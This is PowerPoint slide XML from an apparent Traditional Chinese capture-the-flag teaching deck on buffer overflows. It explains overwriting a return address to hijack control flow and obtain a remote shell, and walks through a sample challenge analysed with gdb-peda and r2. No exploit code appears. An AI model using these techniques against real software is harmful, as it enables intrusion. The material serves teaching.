        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4377417" y="2477180"/>
            <a:ext cx="2946256" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>任務類型 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行攻擊程式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>取得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>最高權限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>回傳控制用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>remote shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文字方塊 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D58C75-5F13-4CC6-8BD8-405A8BB0B91D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202918" y="1830849"/>
            <a:ext cx="9784079" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指的是通過通過程式本身的漏洞，編寫利用指令碼破解程式拿到主機的許可權，這就需要對程式進行分析，瞭解作業系統的特性和相關漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252962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F85BB-17EB-48C9-B15F-8FCA51C861C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文字版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DB18C1-273E-4D60-B2DA-BED1F54971CA}"/>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3129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411950-0266-4F84-9A81-F818E44FB8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>什麼是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" cap="none" dirty="0"/>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D8FD4A-20CD-44BA-A7E2-5DA99D994E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式沒有做邊界檢查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(boundary check)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，導致輸入資料超過邊界</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>當讀取的字串長度超過了分配的記憶體，會把後面的記憶體空間覆寫過去，這就叫做溢位（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>把區域變數的空間都蓋過去了，那就可以竄改 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，掌控程式的運作流程（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>hijack control flow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>），執行你想要的邏輯</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122607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329B3C-38E0-473B-AA33-5B48A6F2B031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>題目</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="內容版面配置區 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80D2F4CD-5DF4-45B1-8C08-0A1C33B7B3D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="4" r="29626"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2712567" y="1899821"/>
            <a:ext cx="6764784" cy="4674003"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{079D0E4E-F438-47A6-A4EC-DCAD78779A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3045041" y="3879542"/>
            <a:ext cx="2077375" cy="1597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E7430DF7-CA80-4DFF-A215-8EBCE9169D30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3045040" y="5143085"/>
            <a:ext cx="3453414" cy="1597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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A0A3462-94A0-4A20-AFEB-E64F53F92CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2352583" y="5222984"/>
            <a:ext cx="692457" cy="5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42196FA4-770C-4712-87E7-46CB393BE028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115410" y="5065065"/>
            <a:ext cx="2237173" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>當</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 等於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0xdeadbeef </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的時候會列印出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直線單箭頭接點 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65B0C264-1F48-4CF9-AC7A-FA68658B7D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2352582" y="3959441"/>
            <a:ext cx="692457" cy="5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AD75AB2D-A68C-4656-BC0A-49409EC81289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439" y="3590109"/>
            <a:ext cx="2352141" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>但是這裡沒有更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的地方</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B69A7DA-4C40-41BD-ABB0-08A4A92C9DEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3045039" y="4876402"/>
            <a:ext cx="2077375" cy="1597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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CFC839D-C871-40C6-A5DD-37713DF31C90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5122414" y="4962482"/>
            <a:ext cx="1108229" cy="73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2EF685F8-2B67-4D4B-9D91-08215F73C33D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858438" y="4819919"/>
            <a:ext cx="4860086" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用函數讀取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>陣列，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>陣列只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個，但是可以讀入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個，這時候就會有問題</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文字方塊 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F69A5E-9230-463E-939F-9EC95E426DBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6230643" y="3960904"/>
            <a:ext cx="3453414" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可以寫入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個字元陣列</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="直線單箭頭接點 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DC88A67-6959-4F28-8FF7-AECF4E6DD663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5145042" y="4119239"/>
            <a:ext cx="1108229" cy="73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833859E5-39D2-4818-A28B-E202E000FE95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3056354" y="4039340"/>
            <a:ext cx="2077375" cy="159798"/>
          </a:xfrm>
          <a:prstGeom prst="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F8BFF846-223B-4327-BF45-7AC906D6C8A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858438" y="5429824"/>
            <a:ext cx="4860086" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在一般情況下是不知道實際上可以輸入多少個，需要測試</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83074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8B2ED-D673-4AD6-83FE-F68F054669C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式行為分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8540643-F3F5-4864-AE04-A96A13A9083B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="1987961"/>
            <a:ext cx="5401429" cy="2495898"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18769CAC-40C1-43DC-81A7-C8FFCDE139EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6604348" y="1987961"/>
            <a:ext cx="4382651" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>無論輸入什麼都回應無法打開後門</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171839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671BF1-ABA0-4305-8C3F-03C9416CB658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>gdb-peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查看程式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B90C124F-C3A3-497F-8922-D873075F705F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1867354" y="2098462"/>
            <a:ext cx="4227605" cy="3943900"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="圖片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93606060-7C50-4B41-A334-7EAE19FBA345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6177405" y="2098462"/>
            <a:ext cx="4258269" cy="2400635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="箭號: 向右 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FABB244C-9ABC-41CF-9D6A-C55F6EF32589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7979182" y="4763585"/>
            <a:ext cx="834501" cy="305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5403699A-27AC-4A2F-A644-D2C606E53FA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7261934" y="5486399"/>
            <a:ext cx="2574524" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>各種程式安全保護機制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1949844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E7149D-6A8B-4DE8-AEAA-1966CF461FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>對</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>進行逆向分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9528DA5E-EF80-48C8-8786-A9BB11746E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3558708" y="2011363"/>
            <a:ext cx="5072996" cy="4206875"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文字方塊 6">
            <a:extLst>
